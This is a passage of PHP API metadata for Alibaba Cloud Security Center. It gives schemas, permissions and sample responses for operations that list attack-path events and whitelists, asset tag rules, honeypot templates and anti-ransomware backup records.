'example' => 'test', 'title' => ''], 'Vendor' => ['description' => 'The vendor of the cloud service asset.', 'type' => 'integer', 'format' => 'int32', 'example' => '0', 'title' => ''], 'SensitiveAssetFlag' => ['description' => 'The sensitive asset flag. Valid values:'."\n" .'- **0**: Not a sensitive asset.'."\n" .'- **1**: A sensitive asset.', 'type' => 'integer', 'format' => 'int32', 'example' => '0', 'title' => ''], ], 'title' => '', 'example' => '', ], 'LastTime' => ['description' => 'The timestamp of the most recent detection. Unit: milliseconds.', 'type' => 'integer', 'format' => 'int64', 'example' => '1742869699000', 'title' => ''], 'DstAsset' => [ 'description' => 'The destination asset.', 'type' => 'object', 'properties' => [ 'InstanceId' => ['description' => 'The ID of the cloud service asset instance.', 'type' => 'string', 'example' => 'i-uf6a1tt9umxwoxqn****', 'title' => ''], 'AssetType' => ['description' => 'The type of the cloud service asset.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'AssetSubType' => ['description' => 'The subtype of the cloud service asset.', 'type' => 'integer', 'format' => 'int32', 'example' => '0', 'title' => ''], 'Vendor' => ['description' => 'The vendor of the cloud service asset.', 'type' => 'integer', 'format' => 'int32', 'example' => '0', 'title' => ''], 'RegionId' => ['description' => 'The region ID of the cloud service asset instance.', 'type' => 'string', 'example' => 'cn-hangzhou', 'title' => ''], 'InstanceName' => ['description' => 'The instance name.', 'type' => 'string', 'example' => 'test', 'title' => ''], 'SensitiveAssetFlag' => ['description' => 'The sensitive asset flag. Valid values:'."\n" .'- **0**: Not a sensitive asset.'."\n" .'- **1**: A sensitive asset.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], ], 'title' => '', 'example' => '', ], 'EventId' => ['description' => 'The ID of the alert event.', 'type' => 'integer', 'format' => 'int64', 'example' => '123', 'title' => ''], 'PathTypeDesc' => ['description' => 'The path type description.', 'type' => 'string', 'example' => 'Privilege Escalation by Role', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], 'PageInfo' => [ 'description' => 'The pagination information.', 'type' => 'object', 'properties' => [ 'CurrentPage' => ['description' => 'The page number of the current page in a paged query.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'PageSize' => ['description' => 'The number of entries per page.', 'type' => 'integer', 'format' => 'int32', 'example' => '20', 'title' => ''], 'TotalCount' => ['description' => 'The total number of entries.', 'type' => 'integer', 'format' => 'int32', 'example' => '30', 'title' => ''], 'Count' => ['description' => 'The number of entries on the current page in a paged query.', 'type' => 'integer', 'format' => 'int32', 'example' => '20', 'title' => ''], ], 'title' => '', 'example' => '', ], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'eventInfo' => [ 'enable' => false, 'eventNames' => [], ], 'title' => 'Query attack path events', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'list', 'ramAction' => [ 'action' => 'yundun-sas:ListAttackPathEvent', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"3956048F-9D73-5EDB-834B-4827BB48****\\",\\n \\"AttackPathEventList\\": [\\n {\\n \\"PathType\\": \\"role_escalation\\",\\n \\"PathName\\": \\"ecs_get_credential_by_create_login_profile\\",\\n \\"PathNameDesc\\": \\"ECS Instance Can Obtain Long-term Access Credential by Enabling Console Logon for RAM User\\",\\n \\"RiskLevel\\": \\"suspicious\\",\\n \\"SrcAsset\\": {\\n \\"InstanceId\\": \\"i-bp18ifsr1tu1dx39****\\",\\n \\"AssetType\\": 0,\\n \\"AssetSubType\\": 1,\\n \\"RegionId\\": \\"cn-hangzhou\\",\\n \\"InstanceName\\": \\"test\\",\\n \\"Vendor\\": 0,\\n \\"SensitiveAssetFlag\\": 0\\n },\\n \\"LastTime\\": 1742869699000,\\n \\"DstAsset\\": {\\n \\"InstanceId\\": \\"i-uf6a1tt9umxwoxqn****\\",\\n \\"AssetType\\": 1,\\n \\"AssetSubType\\": 0,\\n \\"Vendor\\": 0,\\n \\"RegionId\\": \\"cn-hangzhou\\",\\n \\"InstanceName\\": \\"test\\",\\n \\"SensitiveAssetFlag\\": 1\\n },\\n \\"EventId\\": 123,\\n \\"PathTypeDesc\\": \\"Privilege Escalation by Role\\"\\n }\\n ],\\n \\"PageInfo\\": {\\n \\"CurrentPage\\": 1,\\n \\"PageSize\\": 20,\\n \\"TotalCount\\": 30,\\n \\"Count\\": 20\\n }\\n}","type":"json"}]', ], 'ListAttackPathWhitelist' => [ 'summary' => 'Queries the attack path whitelist.', 'methods' => ['post', 'get'], 'schemes' => ['https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'write', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'list', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeCode' => '226514', 'abilityTreeNodes' => ['FEATUREsasAIJXMJ'], 'tenantRelevance' => 'publicInformation', ], 'parameters' => [ [ 'name' => 'PathType', 'in' => 'query', 'schema' => ['description' => 'The path type.'."\n" .'> Call [ListAvailableAttackPath](~~ListAvailableAttackPath~~) to query path types.', 'type' => 'string', 'required' => false, 'example' => 'role_escalation', 'title' => ''], ], [ 'name' => 'PathNameDesc', 'in' => 'query', 'schema' => ['description' => 'The path name description.'."\n" .'> Call [ListAvailableAttackPath](~~ListAvailableAttackPath~~) to query path name descriptions.', 'type' => 'string', 'required' => false, 'example' => 'ECS Instance Can Obtain Long-term Access Credential by Enabling Console Logon for RAM User', 'title' => ''], ], [ 'name' => 'WhitelistName', 'in' => 'query', 'schema' => ['description' => 'The whitelist name.', 'type' => 'string', 'required' => false, 'example' => 'test', 'title' => ''], ], [ 'name' => 'CurrentPage', 'in' => 'query', 'schema' => ['description' => 'The page number when using paging. Default value: **1**.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1', 'title' => ''], ], [ 'name' => 'PageSize', 'in' => 'query', 'schema' => ['description' => 'The maximum number of entries per page when using paging. Default value: 20.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '20', 'title' => ''], ], [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language of the request and response. Default value: **zh**. Valid values:'."\n" .'- **zh**: Chinese'."\n" .'- **en**: English.', 'type' => 'string', 'required' => false, 'example' => 'en', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID, which is a unique identifier generated by Alibaba Cloud for the request. You can use this ID to troubleshoot issues.', 'type' => 'string', 'example' => '89AD16CC-97EE-50F3-9B12-9E28E5C8****', 'title' => ''], 'AttackPathWhitelistList' => [ 'description' => 'The attack path whitelist.', 'type' => 'array', 'items' => [ 'description' => 'The attack path whitelist entry.', 'type' => 'object', 'properties' => [ 'AttackPathWhitelistId' => ['description' => 'The ID of the attack path whitelist entry.', 'type' => 'string', 'example' => 'apwl-b33dec0acf9b42aabde032d656c0****', 'title' => ''], 'LastModifiedTimestamp' => ['description' => 'The timestamp of the last modification, in milliseconds.', 'type' => 'integer', 'format' => 'int64', 'example' => '1731897750000', 'title' => ''], 'PathName' => ['description' => 'The path name.', 'type' => 'string', 'example' => 'ecs_get_credential_by_create_login_profile', 'title' => ''], 'PathType' => ['description' => 'The path type.', 'type' => 'string', 'example' => 'role_escalation', 'title' => ''], 'Remark' => ['description' => 'The remarks.', 'type' => 'string', 'example' => 'test', 'title' => ''], 'WhitelistType' => ['description' => 'The whitelist type.', 'type' => 'string', 'example' => 'PART_ASSET', 'title' => ''], 'WhitelistName' => ['description' => 'The whitelist name.', 'type' => 'string', 'example' => 'test', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], 'PageInfo' => [ 'description' => 'The paging information.', 'type' => 'object', 'properties' => [ 'Count' => ['description' => 'The number of entries returned on the current page when using paging.', 'type' => 'integer', 'format' => 'int32', 'example' => '20', 'title' => ''], 'CurrentPage' => ['description' => 'The current page number when using paging.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'PageSize' => ['description' => 'The number of entries per page.', 'type' => 'integer', 'format' => 'int32', 'example' => '20', 'title' => ''], 'TotalCount' => ['description' => 'The total number of entries.', 'type' => 'integer', 'format' => 'int32', 'example' => '49', 'title' => ''], ], 'title' => '', 'example' => '', ], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'eventInfo' => [ 'enable' => false, 'eventNames' => [], ], 'title' => 'Query attack path whitelist', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'list', 'ramAction' => [ 'action' => 'yundun-sas:ListAttackPathWhitelist', 'authLevel' => 'resource', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'AttackPathWhitelist', 'arn' => 'acs:yundun-sas:{#regionId}:{#accountId}:attackpathwhitelist/*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"89AD16CC-97EE-50F3-9B12-9E28E5C8****\\",\\n \\"AttackPathWhitelistList\\": [\\n {\\n \\"AttackPathWhitelistId\\": \\"apwl-b33dec0acf9b42aabde032d656c0****\\",\\n \\"LastModifiedTimestamp\\": 1731897750000,\\n \\"PathName\\": \\"ecs_get_credential_by_create_login_profile\\",\\n \\"PathType\\": \\"role_escalation\\",\\n \\"Remark\\": \\"test\\",\\n \\"WhitelistType\\": \\"PART_ASSET\\",\\n \\"WhitelistName\\": \\"test\\"\\n }\\n ],\\n \\"PageInfo\\": {\\n \\"Count\\": 20,\\n \\"CurrentPage\\": 1,\\n \\"PageSize\\": 20,\\n \\"TotalCount\\": 49\\n }\\n}","type":"json"}]', ], 'ListAutoTagRules' => [ 'summary' => 'Queries the list of asset tag rules by using the system configuration, feature settings, multi-cloud configuration management, and asset management rule features of Security Center.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => ['operationType' => 'list'], 'parameters' => [ [ 'name' => 'RuleName', 'in' => 'query', 'schema' => ['description' => 'The rule name.', 'type' => 'string', 'required' => false, 'example' => 'text-001', 'title' => ''], ], [ 'name' => 'PageSize', 'in' => 'query', 'schema' => ['description' => 'The maximum number of entries per page in a paging query. Default value: 20. If you leave this parameter empty, 20 entries are returned per page.'."\n" .'> Do not leave PageSize empty.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '20', 'title' => ''], ], [ 'name' => 'CurrentPage', 'in' => 'query', 'schema' => ['description' => 'The page number of the page to return. Default value: **1**, which indicates that the first page is returned.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID, which is a unique identifier generated by Alibaba Cloud for the request. You can use this ID to troubleshoot issues.', 'type' => 'string', 'example' => '1383B0DB-D5D6-4B0C-9E6B-75939C8E67FE', 'title' => ''], 'PageInfo' => [ 'description' => 'The pagination information.', 'type' => 'object', 'properties' => [ 'CurrentPage' => ['description' => 'The page number of the current page in a paging query.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'PageSize' => ['description' => 'The maximum number of entries per page in a paging query.', 'type' => 'integer', 'format' => 'int32', 'example' => '20', 'title' => ''], 'TotalCount' => ['description' => 'The total number of entries.', 'type' => 'integer', 'format' => 'int32', 'example' => '196', 'title' => ''], 'Count' => ['description' => 'The number of entries on the current page in a paging query.', 'type' => 'integer', 'format' => 'int32', 'example' => '2', 'title' => ''], ], 'title' => '', 'example' => '', ], 'AutoTagRuleList' => [ 'description' => 'The list of rules.', 'type' => 'array', 'items' => [ 'description' => 'The rule details.', 'type' => 'object', 'properties' => [ 'Expression' => ['description' => 'The expression of the rule.', 'type' => 'string', 'example' => '[{\\"groups\\":\\"0\\",\\"fieldValueType\\":\\"string\\",\\"field\\":\\"internetIp\\",\\"operator\\":\\"equals\\",\\"value\\":\\"12.0.0.1\\"}]', 'title' => ''], 'TagContext' => ['description' => 'The tagging content.', 'type' => 'string', 'example' => '{\\"tagId\\":4577447}', 'title' => ''], 'AliUid' => ['description' => 'The Alibaba Cloud account ID.', 'type' => 'integer', 'format' => 'int64', 'example' => '558463566374****', 'title' => ''], 'RuleDesc' => ['description' => 'The description of the rule.', 'type' => 'string', 'example' => 'describe', 'title' => ''], 'TagType' => ['description' => 'The tagging type. Valid values:'."\n" .'- **group**: group.'."\n" .'- **tag**: label.', 'type' => 'string', 'example' => 'group', 'title' => ''], 'ModifiedTimestamp' => ['description' => 'The timestamp when the rule was last updated. Unit: milliseconds.', 'type' => 'integer', 'format' => 'int64', 'example' => '1614674401000', 'title' => ''], 'Id' => ['description' => 'The rule ID.', 'type' => 'integer', 'format' => 'int32', 'example' => '900029', 'title' => ''], 'CreateTimestamp' => ['description' => 'The timestamp when the data was created. Unit: milliseconds.', 'type' => 'integer', 'format' => 'int64', 'example' => '1614674401000', 'title' => ''], 'RuleName' => ['description' => 'The rule name.', 'type' => 'string', 'example' => 'auto_test_rule', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Query asset tag rules', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ListAutoTagRules'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'list', 'ramAction' => [ 'action' => 'yundun-sas:ListAutoTagRules', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"1383B0DB-D5D6-4B0C-9E6B-75939C8E67FE\\",\\n \\"PageInfo\\": {\\n \\"CurrentPage\\": 1,\\n \\"PageSize\\": 20,\\n \\"TotalCount\\": 196,\\n \\"Count\\": 2\\n },\\n \\"AutoTagRuleList\\": [\\n {\\n \\"Expression\\": \\"[{\\\\\\\\\\\\\\"groups\\\\\\\\\\\\\\":\\\\\\\\\\\\\\"0\\\\\\\\\\\\\\",\\\\\\\\\\\\\\"fieldValueType\\\\\\\\\\\\\\":\\\\\\\\\\\\\\"string\\\\\\\\\\\\\\",\\\\\\\\\\\\\\"field\\\\\\\\\\\\\\":\\\\\\\\\\\\\\"internetIp\\\\\\\\\\\\\\",\\\\\\\\\\\\\\"operator\\\\\\\\\\\\\\":\\\\\\\\\\\\\\"equals\\\\\\\\\\\\\\",\\\\\\\\\\\\\\"value\\\\\\\\\\\\\\":\\\\\\\\\\\\\\"12.0.0.1\\\\\\\\\\\\\\"}]\\",\\n \\"TagContext\\": \\"{\\\\\\\\\\\\\\"tagId\\\\\\\\\\\\\\":4577447}\\",\\n \\"AliUid\\": 0,\\n \\"RuleDesc\\": \\"describe\\",\\n \\"TagType\\": \\"group\\",\\n \\"ModifiedTimestamp\\": 1614674401000,\\n \\"Id\\": 900029,\\n \\"CreateTimestamp\\": 1614674401000,\\n \\"RuleName\\": \\"auto_test_rule\\"\\n }\\n ]\\n}","type":"json"}]', ], 'ListAvailableAttackPath' => [ 'summary' => 'Query Attack Path List.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'get', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeCode' => '226487', 'abilityTreeNodes' => ['FEATUREsasAIJXMJ'], 'autoTest' => true, 'tenantRelevance' => 'publicInformation', ], 'parameters' => [ [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language type for requests and responses. Values:'."\n" .'- **zh**: Chinese'."\n" .'- **en**: English', 'type' => 'string', 'required' => false, 'example' => 'en', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The ID of this call request, a unique identifier generated by Alibaba Cloud for the request, which can be used to troubleshoot and locate issues.', 'type' => 'string', 'example' => '1383B0DB-D5D6-4B0C-9E6B-75939C8E****', 'title' => ''], 'AttackPathList' => [ 'description' => 'List of attack paths.', 'type' => 'array', 'items' => [ 'description' => 'Attack path data.', 'type' => 'object', 'properties' => [ 'PathType' => ['description' => 'Path type.', 'type' => 'string', 'example' => 'role_escalation', 'title' => ''], 'PathName' => ['description' => 'Path name.', 'type' => 'string', 'example' => 'ecs_get_credential_by_create_login_profile', 'title' => ''], 'PathNameDesc' => ['description' => 'Description of the path name.', 'type' => 'string', 'example' => 'ECS Instance Can Obtain Long-term Access Credential by Enabling Console Logon for RAM User', 'title' => ''], 'PathTypeDesc' => ['description' => 'Description of the path type.', 'type' => 'string', 'example' => 'Privilege Escalation by Role', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"1383B0DB-D5D6-4B0C-9E6B-75939C8E****\\",\\n \\"AttackPathList\\": [\\n {\\n \\"PathType\\": \\"role_escalation\\",\\n \\"PathName\\": \\"ecs_get_credential_by_create_login_profile\\",\\n \\"PathNameDesc\\": \\"ECS Instance Can Obtain Long-term Access Credential by Enabling Console Logon for RAM User\\",\\n \\"PathTypeDesc\\": \\"Privilege Escalation by Role\\"\\n }\\n ]\\n}","type":"json"}]', 'title' => 'ListAvailableAttackPath', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:ListAvailableAttackPath', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], ], 'ListAvailableHoneypot' => [ 'methods' => ['post', 'get'], 'schemes' => ['https', 'http'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => ['operationType' => 'get'], 'parameters' => [ [ 'name' => 'NodeId', 'in' => 'query', 'schema' => ['title' => '', 'description' => 'The ID of the honeypot management node.', 'type' => 'string', 'required' => false, 'example' => '4341018b-8e01-43f6-b1d2-af29a2a4****'], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'title' => '', 'description' => 'ListResult', 'type' => 'object', 'properties' => [ 'Data' => [ 'description' => 'The list of honeypot image information.', 'type' => 'array', 'items' => [ 'type' => 'object', 'properties' => [ 'HoneypotImageName' => ['title' => '', 'description' => 'The name of the honeypot image.', 'type' => 'string', 'example' => 'ruoyi'], 'HoneypotImageDisplayName' => ['title' => '', 'description' => 'The display name of the honeypot image.', 'type' => 'string', 'example' => 'RuoYi'], 'HoneypotImageId' => ['title' => '', 'description' => 'The ID of the honeypot image.', 'type' => 'string', 'example' => 'sha256:007095d6de9c7a343e9fc1f74a7efc9c5de9d5454789d2fa505a1b3fc62****'], 'HoneypotImageVersion' => ['title' => '', 'description' => 'The image version of the honeypot.', 'type' => 'string', 'example' => '1.0.2'], 'HoneypotImageType' => ['title' => '', 'description' => 'The type of the honeypot image.', 'type' => 'string', 'example' => 'Web'], 'Proto' => ['title' => '', 'description' => 'The protocol supported by the honeypot.', 'type' => 'string', 'example' => 'tcp'], 'ServicePort' => ['title' => '', 'description' => 'The service port of the honeypot.', 'type' => 'string', 'example' => '27017.0'], 'Multiports' => ['title' => '', 'description' => 'The ports supported by the honeypot. The value is in JSON format and contains the following fields:'."\n" ."\n" .'- **log_type**: the log type.'."\n" .'- **proto**: the supported protocol.'."\n" .'- **description**: the description.'."\n" .'- **ports**: the set of supported ports.'."\n" .'- **port_str**: the supported ports as a string.'."\n" .'- **type**: the type.', 'type' => 'string', 'example' => '[{"log_type":"web","proto":"tcp","description":"webServerPort","ports":[80.0],"port_str":"80","type":"web"}]'], 'Template' => ['title' => '', 'description' => 'The honeypot configuration parameter template.', 'type' => 'string', 'example' => '{}'], ], 'description' => '', 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], 'Count' => ['description' => 'The number of honeypot images.', 'type' => 'integer', 'format' => 'int32', 'example' => '22', 'title' => ''], 'Success' => ['description' => 'Indicates whether the call was successful. Valid values:'."\n" ."\n" .'- **true**: The call was successful.'."\n" .'- **false**: The call failed.', 'type' => 'boolean', 'example' => 'true', 'title' => ''], 'Code' => ['description' => 'The result code. A value of **200** indicates success. Any other value indicates failure. You can use this field to determine the cause of the failure.', 'type' => 'string', 'example' => '200', 'title' => ''], 'Message' => ['description' => 'The detailed information of the error code.', 'type' => 'string', 'example' => 'successful', 'title' => ''], 'RequestId' => ['description' => 'The request ID, which is a unique identifier generated by Alibaba Cloud for the request. You can use this ID to troubleshoot issues.', 'type' => 'string', 'example' => '6C24D883-984D-52FD-BB66-5F89F86E4837', 'title' => ''], 'HttpStatusCode' => ['description' => 'The HTTP status code.', 'type' => 'integer', 'format' => 'int32', 'example' => '200', 'title' => ''], ], 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Query available honeypot configuration templates', 'summary' => 'Queries available honeypot configuration templates.', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:ListAvailableHoneypot', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"Data\\": [\\n {\\n \\"HoneypotImageName\\": \\"ruoyi\\",\\n \\"HoneypotImageDisplayName\\": \\"RuoYi\\",\\n \\"HoneypotImageId\\": \\"sha256:007095d6de9c7a343e9fc1f74a7efc9c5de9d5454789d2fa505a1b3fc62****\\",\\n \\"HoneypotImageVersion\\": \\"1.0.2\\",\\n \\"HoneypotImageType\\": \\"Web\\",\\n \\"Proto\\": \\"tcp\\",\\n \\"ServicePort\\": \\"27017.0\\",\\n \\"Multiports\\": \\"[{\\\\\\"log_type\\\\\\":\\\\\\"web\\\\\\",\\\\\\"proto\\\\\\":\\\\\\"tcp\\\\\\",\\\\\\"description\\\\\\":\\\\\\"webServerPort\\\\\\",\\\\\\"ports\\\\\\":[80.0],\\\\\\"port_str\\\\\\":\\\\\\"80\\\\\\",\\\\\\"type\\\\\\":\\\\\\"web\\\\\\"}]\\",\\n \\"Template\\": \\"{}\\"\\n }\\n ],\\n \\"Count\\": 22,\\n \\"Success\\": true,\\n \\"Code\\": \\"200\\",\\n \\"Message\\": \\"successful\\",\\n \\"RequestId\\": \\"6C24D883-984D-52FD-BB66-5F89F86E4837\\",\\n \\"HttpStatusCode\\": 200\\n}","type":"json"}]', ], 'ListBackupRecord' => [ 'summary' => 'Queries a list of backup records.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => ['operationType' => 'list', 'riskType' => 'none', 'chargeType' => 'free'], 'parameters' => [ [ 'name' => 'MachineRemark', 'in' => 'query', 'schema' => ['description' => 'The identification information of the server protected by the anti-ransomware policy that you want to query. You can enter the IP address or instance ID of the server.', 'type' => 'string', 'title' => '', 'required' => false, 'example' => '192.168.XX.XX'], ], [ 'name' => 'StatusList', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'title' => '', 'description' => 'The list of backup task statuses. Valid values:'."\n" .'- **BACKUP_COMPLETE**: backup succeeded'."\n" .'- **BACKUP_FAILED**: backup failed'."\n" .'- **PARTIAL_COMPLETE**: partial backup succeeded.', 'type' => 'array', 'items' => ['description' => 'The list of backup task statuses.', 'type' => 'string', 'required' => false, 'example' => '["BACKUP_COMPLETE"]', 'title' => ''], 'required' => false, 'maxItems' => 100, 'example' => '', ], ], [ 'name' => 'BackupStartTime', 'in' => 'query', 'schema' => ['description' => 'The backup start time. The value is a timestamp in milliseconds.', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '1699514211000', 'title' => ''], ], [ 'name' => 'BackupEndTime', 'in' => 'query', 'schema' => ['description' => 'The backup end time. The value is a timestamp in milliseconds.', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '1699600611000', 'title' => ''], ], [ 'name' => 'CurrentPage', 'in' => 'query', 'schema' => ['description' => 'The page number of the page to return. Default value: **1**, which indicates the first page.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1', 'title' => ''], ], [ 'name' => 'PageSize', 'in' => 'query', 'schema' => ['description' => 'The maximum number of entries per page in a paged query. Default value: 20. If you leave this parameter empty, 20 entries are returned.'."\n" .'> Do not leave PageSize empty.', 'type' => 'integer', 'title' => '', 'format' => 'int32', 'maximum' => '200', 'minimum' => '10', 'required' => false, 'example' => '20'], ], ], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The ID of the request. Alibaba Cloud generates a unique identifier for each request. You can use the ID to troubleshoot issues.', 'type' => 'string', 'example' => '3956048F-9D73-5EDB-834B-4827BB48****', 'title' => ''], 'BackupRecordList' => [ 'description' => 'The list of backup records.', 'type' => 'array', 'items' => [ 'type' => 'object', 'properties' => [ 'Uuid' => ['description' => 'The UUID of the server backed up by database anti-ransomware.', 'type' => 'string', 'example' => 'b93cccb9-f19f-4886-97fe-47df26ba****', 'title' => ''], 'ClientId' => ['description' => 'The anti-ransomware client ID.', 'type' => 'string', 'example' => 'c-0002bgagelj3d2sc****', 'title' => ''], 'BackupPlanId' => ['description' => 'The backup plan ID.', 'type' => 'string', 'example' => 'plan-000c4tt43nolmx96****', 'title' => ''], 'BackupJobId' => ['description' => 'The backup task ID.', 'type' => 'string', 'example' => 'a006f24d069843c88688672d74ee****', 'title' => ''], 'BackupStartTime' => ['description' => 'The backup start time. The value is a timestamp in milliseconds.', 'type' => 'integer', 'format' => 'int64', 'example' => '1699514211000', 'title' => ''], 'BackupEndTime' => ['description' => 'The backup end time. The value is a timestamp in milliseconds.', 'type' => 'integer', 'format' => 'int64', 'example' => '1699600611000', 'title' => ''], 'BackupStatus' => ['description' => 'The backup task status. Valid values:'."\n" .'- **BACKUP_COMPLETE**: backup succeeded'."\n" .'- **BACKUP_FAILED**: backup failed'."\n" .'- **PARTIAL_COMPLETE**: partial backup succeeded.', 'type' => 'string', 'example' => 'BACKUP_COMPLETE', 'title' => ''], 'ErrorCode' => ['description' => 'The error code of the backup task.', 'type' => 'string', 'example' => 'FILE_CACHE_NO_SPACE', 'title' => ''], 'ErrorMessage' => ['description' => 'The error details of the backup task.', 'type' => 'string', 'example' => 'FILE_CACHE_NO_SPACE', 'title' => ''], 'InstanceName' => ['description' => 'The instance name of the asset.', 'type' => 'string', 'example' => 'openapi', 'title' => ''], 'Ip' => ['description' => 'The IP address of the server.', 'type' => 'string', 'example' => '1.1.1.1', 'title' => ''], 'InstanceId' => ['description' => 'The ID of the server instance.', 'type' => 'string', 'example' => 'i-wz9ikn44p46krnic****', 'title' => ''], 'InternetIp' => ['description' => 'The public IP address of the server.', 'type' => 'string', 'example' => '1.1.1.1'."\n", 'title' => ''], 'IntranetIp' => ['description' => 'The private IP address of the server.', 'type' => 'string', 'example' => '192.168.1.1', 'title' => ''], 'RegionId' => ['description' => 'The region ID of the backup service.', 'type' => 'string', 'example' => 'cn-hangzhou', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], 'PageInfo' => [ 'description' => 'The pagination information.', 'type' => 'object', 'properties' => [ 'CurrentPage' => ['description' => 'The page number of the current page in a paged query.', 'type' => 'integer', 'format' => 'int32', 'example' => '2', 'title' => ''], 'PageSize' => ['description' => 'The maximum number of entries per page in a paged query.', 'type' => 'integer', 'format' => 'int32', 'example' => '20', 'title' => ''], 'TotalCount' => ['description' => 'The total number of entries returned.', 'type' => 'integer', 'format' => 'int32', 'example' => '100', 'title' => ''], 'Count' => 